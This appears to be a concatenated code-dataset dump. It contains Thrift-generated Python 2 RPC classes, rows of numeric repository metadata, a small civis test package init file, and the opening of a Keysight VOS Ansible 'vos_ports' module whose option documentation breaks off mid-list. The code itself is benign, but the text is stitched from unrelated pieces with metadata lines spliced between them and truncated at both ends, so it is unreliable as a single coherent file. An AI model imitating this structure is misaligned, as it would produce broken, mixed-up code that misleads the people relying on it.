class phase_4_message_result:
thrift_spec = (
)
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('phase_4_message_result')
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __hash__(self):
value = 17
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class phase_5_message_args:
"""
Attributes:
- p5
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'p5', (Phase_5_msg, Phase_5_msg.thrift_spec), None, ), # 1
)
def __init__(self, p5=None,):
self.p5 = p5
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.p5 = Phase_5_msg()
self.p5.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('phase_5_message_args')
if self.p5 is not None:
oprot.writeFieldBegin('p5', TType.STRUCT, 1)
self.p5.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __hash__(self):
value = 17
value = (value * 31) ^ hash(self.p5)
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class phase_5_message_result:
thrift_spec = (
)
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('phase_5_message_result')
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __hash__(self):
value = 17
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class get_peers_args:
thrift_spec = (
)
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('get_peers_args')
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __hash__(self):
value = 17
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class get_peers_result:
"""
Attributes:
- success
- unauthorized
"""
thrift_spec = (
(0, TType.LIST, 'success', (TType.STRUCT,(Node, Node.thrift_spec)), None, ), # 0
(1, TType.STRUCT, 'unauthorized', (UnauthorizedException, UnauthorizedException.thrift_spec), None, ), # 1
)
def __init__(self, success=None, unauthorized=None,):
self.success = success
self.unauthorized = unauthorized
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.LIST:
self.success = []
(_etype84, _size81) = iprot.readListBegin()
for _i85 in xrange(_size81):
_elem86 = Node()
_elem86.read(iprot)
self.success.append(_elem86)
iprot.readListEnd()
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.unauthorized = UnauthorizedException()
self.unauthorized.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('get_peers_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.LIST, 0)
oprot.writeListBegin(TType.STRUCT, len(self.success))
for iter87 in self.success:
iter87.write(oprot)
oprot.writeListEnd()
oprot.writeFieldEnd()
if self.unauthorized is not None:
oprot.writeFieldBegin('unauthorized', TType.STRUCT, 1)
self.unauthorized.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __hash__(self):
value = 17
value = (value * 31) ^ hash(self.success)
value = (value * 31) ^ hash(self.unauthorized)
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
| 29.912791 | 188 | 0.678076 | 6,103 | 51,450 | 5.406194 | 0.029821 | 0.032127 | 0.026459 | 0.056435 | 0.895375 | 0.864551 | 0.846821 | 0.823604 | 0.799418 | 0.784779 | 0 | 0.009017 | 0.211059 | 51,450 | 1,719 | 189 | 29.930192 | 0.803824 | 0.015024 | 0 | 0.803994 | 1 | 0 | 0.028068 | 0.00219 | 0 | 0 | 0 | 0 | 0 | 1 | 0.144231 | false | 0.028846 | 0.005178 | 0.04216 | 0.288462 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
f93208a2d4c866623e19f750f7fea25bc894c564 | 173 | py | Python | civis/tests/__init__.py | civisanalytics/civis-python | 96a31a77fcf7c9678052f55aafe2939e9f56874f | [
"BSD-3-Clause"
] | 31 | 2016-11-14T14:26:24.000Z | 2021-11-19T15:43:45.000Z | civis/tests/__init__.py | civisanalytics/civis-python | 96a31a77fcf7c9678052f55aafe2939e9f56874f | [
"BSD-3-Clause"
] | 296 | 2016-11-11T20:52:59.000Z | 2022-02-23T13:34:37.000Z | civis/tests/__init__.py | civisanalytics/civis-python | 96a31a77fcf7c9678052f55aafe2939e9f56874f | [
"BSD-3-Clause"
] | 40 | 2016-11-11T20:48:13.000Z | 2021-04-22T17:47:09.000Z | from civis.tests.mocks import (
create_client_mock, create_client_mock_for_container_tests
)
__all__ = ["create_client_mock", "create_client_mock_for_container_tests"]
| 28.833333 | 74 | 0.83237 | 24 | 173 | 5.25 | 0.458333 | 0.380952 | 0.507937 | 0.349206 | 0.777778 | 0.777778 | 0.777778 | 0.777778 | 0.777778 | 0 | 0 | 0 | 0.092486 | 173 | 5 | 75 | 34.6 | 0.802548 | 0 | 0 | 0 | 0 | 0 | 0.323699 | 0.219653 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 0.25 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
f9caa62266cb0c7b578f369dc60a1d4e436cbfdc | 79,859 | py | Python | vos_ansible_files/modules/network/vos/vos_ports.py | OpenIxia/AnsibleNVOS | c5d32a1737efa1dd6862f2f8c9074e4ff428b0b6 | [
"MIT"
] | 3 | 2019-10-03T11:56:18.000Z | 2019-11-21T19:22:51.000Z | vos_ansible_files/modules/network/vos/vos_ports.py | OpenIxia/AnsibleVOS | c5d32a1737efa1dd6862f2f8c9074e4ff428b0b6 | [
"MIT"
] | null | null | null | vos_ansible_files/modules/network/vos/vos_ports.py | OpenIxia/AnsibleVOS | c5d32a1737efa1dd6862f2f8c9074e4ff428b0b6 | [
"MIT"
] | null | null | null | """
COPYRIGHT 2021 Keysight Technologies.
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights to
use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
of the Software, and to permit persons to whom the Software is furnished to do
so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
Keysight Visibility Operating System (VOS) module used to issue Web API calls
implying the 'ports' resource from Ansible.
"""
ANSIBLE_METADATA = {
'metadata_version': '1.1',
'supported_by': 'community',
'status': ['preview']
}
DOCUMENTATION = '''
---
module: vos_ports
short_description: This module handles interactions with Keysight Visibility Operating System (VOS) ports.
version_added: "2.8"
description:
- This module handles interactions with VOS ports settings.
- VOS version 5.2.0
- Sub-options marked as required are mandatory only when the top parameter is used.
options:
port:
description:
- Key used to identify the current entity. Alternative to name. Relevant when the name has to be changed.
type: string
delete:
description:
- Key used to mark that current entity would be deleted.
type: bool
settings:
description:
- The properties to be changed.
type: dict
required: true
suboptions:
afm_pipeline_direction:
description:
- The AFM pipeline direction is a read-only property in most cases, reflecting the mode of any enabled advanced features. The direction is automatically updated any time the mode of an enabled advanced features is changed or when the port mode requires a particular direction. The only case where this property can be updated is when adding a port configured to the SIMPLEX port mode into a port group. If no advanced features are enabled on the port, the system will default to allowing AFM features on the network side and not on the tool side. If the network-side port needs to be put in a port group that doesnt allow advanced features, or the tool-side port needs to be put in an advanced port group, the AFM_PIPELINE_DIRECTION will need to be set to EGRESS.
- Available on all platforms.
type: string
choices: ['EGRESS', 'INGRESS']
cdr_bypass_enabled:
description:
- Available on 7300 Series, E100 Series, Vision Edge OS, Vision X Series.
type: bool
connect_in_access_settings:
description:
- Available on all platforms.
type: dict
suboptions:
groups:
description:
- List of items described below.
- The NAME property of a group
required: true
type: list
policy:
required: true
type: string
choices: ['ALLOW_ALL', 'REQUIRE_MEMBER', 'REQUIRE_ADMIN']
connect_out_access_settings:
description:
- Available on all platforms.
type: dict
suboptions:
groups:
description:
- List of items described below.
- The NAME property of a group
required: true
type: list
policy:
required: true
type: string
choices: ['ALLOW_ALL', 'REQUIRE_MEMBER', 'REQUIRE_ADMIN']
copper_link_polling:
description:
- Enables or disables the setting for link polling for 1000Base-T Copper SFPs. It does not apply to a port group.
- Available on 7300 Series, TradeVision Series, E100 Series, E40 Series, Vision Edge OS, Vision X Series, F100 Series, F400 Series.
type: bool
custom_icon_id:
description:
- Available on all platforms.
type: integer
description:
description:
- Sets the optional, user-assigned port description.
- Available on all platforms.
type: string
direct_attach_copper:
description:
- Enables or disables the flag that sets whether the port is using Direct Attach Copper (enabled) or Fiber (disabled).
- Available on all platforms.
type: bool
enabled:
description:
- Available on all platforms.
type: bool
filter_criteria:
description:
- Available on all platforms.
type: dict
suboptions:
custom_mac_dst:
description:
- List of items described below.
type: list
suboptions:
addr:
description:
- List of items described below.
required: true
type: list
field_name:
type: string
field_set:
type: string
choices: ['FS2', 'FS1', 'BOTH']
custom_mac_flow:
description:
- List of items described below.
type: list
suboptions:
address_sets:
description:
- List of items described below.
required: true
type: list
suboptions:
addr_a:
description:
- List of items described below.
required: true
type: list
addr_b:
description:
- List of items described below.
required: true
type: list
flow_type:
required: true
type: string
choices: ['UNI', 'BIDI']
custom_mac_src:
description:
- List of items described below.
type: list
suboptions:
addr:
description:
- List of items described below.
required: true
type: list
field_name:
type: string
field_set:
type: string
choices: ['FS2', 'FS1', 'BOTH']
custom_mac_src_or_dst:
description:
- List of items described below.
type: list
suboptions:
addr:
description:
- List of items described below.
required: true
type: list
field_name:
type: string
field_set:
type: string
choices: ['FS2', 'FS1', 'BOTH']
custom_mac_srcdst_pair:
description:
- List of items described below.
type: list
suboptions:
addr_a:
description:
- List of items described below.
required: true
type: list
addr_b:
description:
- List of items described below.
required: true
type: list
dscp:
description:
- List of items described below.
type: list
suboptions:
value:
required: true
type: string
ethertype:
description:
- List of items described below.
type: list
suboptions:
value:
required: true
type: string
gtp_teid:
description:
- List of items described below.
type: list
suboptions:
field_name:
type: string
field_set:
type: string
choices: ['FS2', 'FS1', 'BOTH']
value:
required: true
type: integer
inner_ip_protocol:
description:
- List of items described below.
type: list
suboptions:
field_name:
type: string
field_set:
type: string
choices: ['FS2', 'FS1', 'BOTH']
value:
required: true
type: integer
inner_ip_version:
description:
- List of items described below.
type: list
suboptions:
field_name:
type: string
field_set:
type: string
choices: ['FS2', 'FS1', 'BOTH']
value:
required: true
type: string or integer
inner_ipv4_dst_addr:
description:
- List of items described below.
type: list
suboptions:
addr:
description:
- List of items described below.
required: true
type: list
field_name:
type: string
field_set:
type: string
choices: ['FS2', 'FS1', 'BOTH']
inner_ipv4_flow:
description:
- List of items described below.
type: list
suboptions:
address_sets:
description:
- List of items described below.
required: true
type: list
suboptions:
addr_a:
description:
- List of items described below.
required: true
type: list
addr_b:
description:
- List of items described below.
required: true
type: list
flow_type:
required: true
type: string
choices: ['UNI', 'BIDI']
inner_ipv4_l4_dst_port:
description:
- List of items described below.
type: list
suboptions:
field_name:
type: string
field_set:
type: string
choices: ['FS2', 'FS1', 'BOTH']
port:
required: true
type: integer
inner_ipv4_l4_port_flow:
description:
- List of items described below.
type: list
suboptions:
flow_type:
required: true
type: string
choices: ['UNI', 'BIDI']
port_sets:
description:
- List of items described below.
required: true
type: list
suboptions:
port_a:
required: true
type: integer
port_b:
required: true
type: integer
inner_ipv4_l4_src_or_dst_port:
description:
- List of items described below.
type: list
suboptions:
field_name:
type: string
field_set:
type: string
choices: ['FS2', 'FS1', 'BOTH']
port:
required: true
type: integer
inner_ipv4_l4_src_port:
description:
- List of items described below.
type: list
suboptions:
field_name:
type: string
field_set:
type: string
choices: ['FS2', 'FS1', 'BOTH']
port:
required: true
type: integer
inner_ipv4_l4_srcdst_port_pair:
description:
- List of items described below.
type: list
suboptions:
field_name:
type: string
port_a:
required: true
type: integer
port_b:
required: true
type: integer
inner_ipv4_src_addr:
description:
- List of items described below.
type: list
suboptions:
addr:
description:
- List of items described below.
required: true
type: list
field_name:
type: string
field_set:
type: string
choices: ['FS2', 'FS1', 'BOTH']
inner_ipv4_src_or_dst:
description:
- List of items described below.
type: list
suboptions:
addr:
description:
- List of items described below.
required: true
type: list
field_name:
type: string
field_set:
type: string
choices: ['FS2', 'FS1', 'BOTH']
inner_ipv4_srcdst_pair:
description:
- List of items described below.
type: list
suboptions:
addr_a:
description:
- List of items described below.
required: true
type: list
addr_b:
description:
- List of items described below.
required: true
type: list
field_name:
type: string
inner_ipv6_dst_addr:
description:
- List of items described below.
type: list
suboptions:
addr:
description:
- List of items described below.
required: true
type: list
field_name:
type: string
field_set:
type: string
choices: ['FS2', 'FS1', 'BOTH']
inner_ipv6_dst_interface_id:
description:
- List of items described below.
type: list
suboptions:
field_name:
type: string
field_set:
type: string
choices: ['FS2', 'FS1', 'BOTH']
value:
description:
- List of items described below.
required: true
type: list
inner_ipv6_flow:
description:
- List of items described below.
type: list
suboptions:
address_sets:
description:
- List of items described below.
required: true
type: list
suboptions:
addr_a:
description:
- List of items described below.
required: true
type: list
addr_b:
description:
- List of items described below.
required: true
type: list
flow_type:
required: true
type: string
choices: ['UNI', 'BIDI']
inner_ipv6_l4_dst_port:
description:
- List of items described below.
type: list
suboptions:
field_name:
type: string
field_set:
type: string
choices: ['FS2', 'FS1', 'BOTH']
port:
required: true
type: integer
inner_ipv6_l4_port_flow:
description:
- List of items described below.
type: list
suboptions:
flow_type:
required: true
type: string
choices: ['UNI', 'BIDI']
port_sets:
description:
- List of items described below.
required: true
type: list
suboptions:
port_a:
required: true
type: integer
port_b:
required: true
type: integer
inner_ipv6_l4_src_or_dst_port:
description:
- List of items described below.
type: list
suboptions:
field_name:
type: string
field_set:
type: string
choices: ['FS2', 'FS1', 'BOTH']
port:
required: true
type: integer
inner_ipv6_l4_src_port:
description:
- List of items described below.
type: list
suboptions:
field_name:
type: string
field_set:
type: string
choices: ['FS2', 'FS1', 'BOTH']
port:
required: true
type: integer
inner_ipv6_l4_srcdst_port_pair:
description:
- List of items described below.
type: list
suboptions:
field_name:
type: string
port_a:
required: true
type: integer
port_b:
required: true
type: integer
inner_ipv6_src_addr:
description:
- List of items described below.
type: list
suboptions:
addr:
description:
- List of items described below.
required: true
type: list
field_name:
type: string
field_set:
type: string
choices: ['FS2', 'FS1', 'BOTH']
inner_ipv6_src_interface_id:
description:
- List of items described below.
type: list
suboptions:
field_name:
type: string
field_set:
type: string
choices: ['FS2', 'FS1', 'BOTH']
value:
description:
- List of items described below.
required: true
type: list
inner_ipv6_src_or_dst:
description:
- List of items described below.
type: list
suboptions:
addr:
description:
- List of items described below.
required: true
type: list
field_name:
type: string
field_set:
type: string
choices: ['FS2', 'FS1', 'BOTH']
inner_ipv6_srcdst_pair:
description:
- List of items described below.
type: list
suboptions:
addr_a:
description:
- List of items described below.
required: true
type: list
addr_b:
description:
- List of items described below.
required: true
type: list
field_name:
type: string
inner_vlan:
description:
- List of items described below.
type: list
suboptions:
priority:
type: string
vlan_id:
type: integer
ip_fragment:
description:
- List of items described below.
type: list
suboptions:
value:
required: true
type: string
choices: ['NON_FRAGMENT', 'FRAGMENT', 'FIRST_FRAGMENT']
ip_protocol:
description:
- List of items described below.
type: list
suboptions:
value:
required: true
type: integer
ipv4_dst:
description:
- List of items described below.
type: list
suboptions:
addr:
description:
- List of items described below.
required: true
type: list
ipv4_flow:
description:
- List of items described below.
type: list
suboptions:
address_sets:
description:
- List of items described below.
required: true
type: list
suboptions:
addr_a:
description:
- List of items described below.
required: true
type: list
addr_b:
description:
- List of items described below.
required: true
type: list
flow_type:
required: true
type: string
choices: ['UNI', 'BIDI']
ipv4_session_dst:
description:
- List of items described below.
- The IPv4 session specifications may have either the address be set to all dont care (CIDR is 0 or the Netmask is 0.0.0.0) or the port be dont care (left blank), but not both.
type: list
suboptions:
sessions:
description:
- List of items described below.
- An IPv4 address and a port. The port may be left blank, as in 3.2.1.0/20. If the CIDR is 0 or the Netmask is 0000, then the criterion will not filter on the address at all, meaning there would be no distinction between an IPv4 and IPv6 address. Examples (CIDR) 11.22.33.44/2415-17, 19, (Netmask) 10.11.12.13/255.255.255.10530, (No mask type) 90.80.70.60-6514, 17, 20-22
required: true
type: list
ipv4_session_flow:
description:
- List of items described below.
type: list
suboptions:
flow_type:
required: true
type: string
choices: ['UNI', 'BIDI']
session_sets:
description:
- List of items described below.
- A flow set allows only one IPv4 specification where both the address is all dont care (CIDR is 0 or the Netmask is 0.0.0.0) and the port is dont care (left blank), whether in the a_session or b_session.
required: true
type: list
suboptions:
a_sessions:
description:
- List of items described below.
- An IPv4 address and a port. The port may be left blank, as in 3.2.1.0/20. If the CIDR is 0 or the Netmask is 0000, then the criterion will not filter on the address at all, meaning there would be no distinction between an IPv4 and IPv6 address. Examples (CIDR) 11.22.33.44/2415-17, 19, (Netmask) 10.11.12.13/255.255.255.10530, (No mask type) 90.80.70.60-6514, 17, 20-22
required: true
type: list
b_sessions:
description:
- List of items described below.
- An IPv4 address and a port. The port may be left blank, as in 3.2.1.0/20. If the CIDR is 0 or the Netmask is 0000, then the criterion will not filter on the address at all, meaning there would be no distinction between an IPv4 and IPv6 address. Examples (CIDR) 11.22.33.44/2415-17, 19, (Netmask) 10.11.12.13/255.255.255.10530, (No mask type) 90.80.70.60-6514, 17, 20-22
required: true
type: list
ipv4_session_src:
description:
- List of items described below.
- The IPv4 session specifications may have either the address be set to all dont care (CIDR is 0 or the Netmask is 0.0.0.0) or the port be dont care (left blank), but not both.
type: list
suboptions:
sessions:
description:
- List of items described below.
- An IPv4 address and a port. The port may be left blank, as in 3.2.1.0/20. If the CIDR is 0 or the Netmask is 0000, then the criterion will not filter on the address at all, meaning there would be no distinction between an IPv4 and IPv6 address. Examples (CIDR) 11.22.33.44/2415-17, 19, (Netmask) 10.11.12.13/255.255.255.10530, (No mask type) 90.80.70.60-6514, 17, 20-22
required: true
type: list
ipv4_session_src_or_dst:
description:
- List of items described below.
- The IPv4 session specifications may have either the address be set to all dont care (CIDR is 0 or the Netmask is 0.0.0.0) or the port be dont care (left blank), but not both.
type: list
suboptions:
sessions:
description:
- List of items described below.
- An IPv4 address and a port. The port may be left blank, as in 3.2.1.0/20. If the CIDR is 0 or the Netmask is 0000, then the criterion will not filter on the address at all, meaning there would be no distinction between an IPv4 and IPv6 address. Examples (CIDR) 11.22.33.44/2415-17, 19, (Netmask) 10.11.12.13/255.255.255.10530, (No mask type) 90.80.70.60-6514, 17, 20-22
required: true
type: list
ipv4_src:
description:
- List of items described below.
type: list
suboptions:
addr:
description:
- List of items described below.
required: true
type: list
ipv4_src_or_dst:
description:
- List of items described below.
type: list
suboptions:
addr:
description:
- List of items described below.
required: true
type: list
ipv4_srcdst_pair:
description:
- List of items described below.
type: list
suboptions:
addr_a:
description:
- List of items described below.
required: true
type: list
addr_b:
description:
- List of items described below.
required: true
type: list
field_name:
type: string
ipv6_dst:
description:
- List of items described below.
type: list
suboptions:
addr:
description:
- List of items described below.
required: true
type: list
ipv6_flow:
description:
- List of items described below.
type: list
suboptions:
address_sets:
description:
- List of items described below.
required: true
type: list
suboptions:
addr_a:
description:
- List of items described below.
required: true
type: list
addr_b:
description:
- List of items described below.
required: true
type: list
flow_type:
required: true
type: string
choices: ['UNI', 'BIDI']
ipv6_session_dst:
description:
- List of items described below.
- The IPv6 session specification may have either the address be set to all dont care (CIDR is 0 or the Netmask is 00000000) or the port be dont care (left blank), but not both.
type: list
suboptions:
sessions:
description:
- List of items described below.
- An IPv6 address and a port. The port may be left blank, as in 3210dcba. If a CIDR of 0 or a Netmask of 00000000 is used, then the criterion will not filter on the address at all, meaning there would be no distinction between an IPv4 and IPv6 address. Note that protocol calls for the IPv6 address portion to appear within square brackets [12345678]24. However, since JSON already uses square brackets to denote an array, the address should not appear within square brackets - the port will be assumed to follow the last colon. Examples (CIDR) 1122334455667788/2415-17, 19, (Netmask) 1011121314151617/255.255.255.10530, (No mask type) 90.80.70.605040302014, 17, 20-22
required: true
type: list
ipv6_session_flow:
description:
- List of items described below.
type: list
suboptions:
flow_type:
required: true
type: string
choices: ['UNI', 'BIDI']
session_sets:
description:
- List of items described below.
- A flow set allows only one IPv6 specification where both the address is all dont care (CIDR is 0 or the Netmask is 00000000) and the port is dont care (left blank), whether in the a_session or b_session.
required: true
type: list
suboptions:
a_sessions:
description:
- List of items described below.
- An IPv6 address and a port. The port may be left blank, as in 3210dcba. If a CIDR of 0 or a Netmask of 00000000 is used, then the criterion will not filter on the address at all, meaning there would be no distinction between an IPv4 and IPv6 address. Note that protocol calls for the IPv6 address portion to appear within square brackets [12345678]24. However, since JSON already uses square brackets to denote an array, the address should not appear within square brackets - the port will be assumed to follow the last colon. Examples (CIDR) 1122334455667788/2415-17, 19, (Netmask) 1011121314151617/255.255.255.10530, (No mask type) 90.80.70.605040302014, 17, 20-22
required: true
type: list
b_sessions:
description:
- List of items described below.
- An IPv6 address and a port. The port may be left blank, as in 3210dcba. If a CIDR of 0 or a Netmask of 00000000 is used, then the criterion will not filter on the address at all, meaning there would be no distinction between an IPv4 and IPv6 address. Note that protocol calls for the IPv6 address portion to appear within square brackets [12345678]24. However, since JSON already uses square brackets to denote an array, the address should not appear within square brackets - the port will be assumed to follow the last colon. Examples (CIDR) 1122334455667788/2415-17, 19, (Netmask) 1011121314151617/255.255.255.10530, (No mask type) 90.80.70.605040302014, 17, 20-22
required: true
type: list
ipv6_session_src:
description:
- List of items described below.
- The IPv6 session specification may have either the address be set to all dont care (CIDR is 0 or the Netmask is 00000000) or the port be dont care (left blank), but not both.
type: list
suboptions:
sessions:
description:
- List of items described below.
- An IPv6 address and a port. The port may be left blank, as in 3210dcba. If a CIDR of 0 or a Netmask of 00000000 is used, then the criterion will not filter on the address at all, meaning there would be no distinction between an IPv4 and IPv6 address. Note that protocol calls for the IPv6 address portion to appear within square brackets [12345678]24. However, since JSON already uses square brackets to denote an array, the address should not appear within square brackets - the port will be assumed to follow the last colon. Examples (CIDR) 1122334455667788/2415-17, 19, (Netmask) 1011121314151617/255.255.255.10530, (No mask type) 90.80.70.605040302014, 17, 20-22
required: true
type: list
ipv6_session_src_or_dst:
description:
- List of items described below.
- The IPv6 session specification may have either the address be set to all dont care (CIDR is 0 or the Netmask is 00000000) or the port be dont care (left blank), but not both.
type: list
suboptions:
sessions:
description:
- List of items described below.
- An IPv6 address and a port. The port may be left blank, as in 3210dcba. If a CIDR of 0 or a Netmask of 00000000 is used, then the criterion will not filter on the address at all, meaning there would be no distinction between an IPv4 and IPv6 address. Note that protocol calls for the IPv6 address portion to appear within square brackets [12345678]24. However, since JSON already uses square brackets to denote an array, the address should not appear within square brackets - the port will be assumed to follow the last colon. Examples (CIDR) 1122334455667788/2415-17, 19, (Netmask) 1011121314151617/255.255.255.10530, (No mask type) 90.80.70.605040302014, 17, 20-22
required: true
type: list
ipv6_src:
description:
- List of items described below.
type: list
suboptions:
addr:
description:
- List of items described below.
required: true
type: list
ipv6_src_or_dst:
description:
- List of items described below.
type: list
suboptions:
addr:
description:
- List of items described below.
required: true
type: list
ipv6_srcdst_pair:
description:
- List of items described below.
type: list
suboptions:
addr_a:
description:
- List of items described below.
required: true
type: list
addr_b:
description:
- List of items described below.
required: true
type: list
field_name:
type: string
layer4_dst_port:
description:
- List of items described below.
type: list
suboptions:
port:
required: true
type: integer
layer4_port_flow:
description:
- List of items described below.
type: list
suboptions:
flow_type:
required: true
type: string
choices: ['UNI', 'BIDI']
port_sets:
description:
- List of items described below.
required: true
type: list
suboptions:
port_a:
required: true
type: integer
port_b:
required: true
type: integer
layer4_src_or_dst_port:
description:
- List of items described below.
type: list
suboptions:
port:
required: true
type: integer
layer4_src_port:
description:
- List of items described below.
type: list
suboptions:
port:
required: true
type: integer
layer4_srcdst_port_pair:
description:
- List of items described below.
type: list
suboptions:
field_name:
type: string
port_a:
required: true
type: integer
port_b:
required: true
type: integer
logical_operation:
type: string
choices: ['OR', 'AND']
mac_dst:
description:
- List of items described below.
type: list
suboptions:
addr:
description:
- List of items described below.
type: list
admin_type:
type: string
choices: ['UNIVERSAL', 'LOCAL', 'ANY']
dest_addr_type:
required: true
type: string
choices: ['GROUP', 'ANY', 'INDIVIDUAL']
mac_flow:
description:
- List of items described below.
type: list
suboptions:
address_sets:
description:
- List of items described below.
required: true
type: list
suboptions:
addr_a:
description:
- List of items described below.
required: true
type: list
addr_b:
description:
- List of items described below.
required: true
type: list
flow_type:
required: true
type: string
choices: ['UNI', 'BIDI']
mac_src:
description:
- List of items described below.
type: list
suboptions:
addr:
description:
- List of items described below.
type: list
admin_type:
type: string
